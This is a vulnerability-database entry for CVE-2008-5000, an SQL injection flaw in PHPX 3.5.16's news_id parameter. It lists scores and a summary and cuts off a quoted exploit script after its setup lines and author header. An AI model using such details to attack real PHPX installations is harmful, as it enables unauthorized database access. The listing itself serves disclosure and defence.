6.8
CVSSv2

CVE-2008-5000

Published: 10/11/2008 Updated: 29/09/2017
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in admin/includes/news.inc.php in PHPX 3.5.16, when magic_quotes_gpc is disabled, allows remote malicious users to execute arbitrary SQL commands via uppercase characters in the news_id parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

phpx phpx 3.5.16

Exploits

<?php error_reporting(0); ini_set("default_socket_timeout",5); set_time_limit(0); /* --------------------------------------------------- PHP X 3516 (news_id) Remote SQL Injection Exploit --------------------------------------------------- By StAkeR[at]hotmail[dot]it Download On wwwphpxorg/projectphp NOTE: Magic_ ...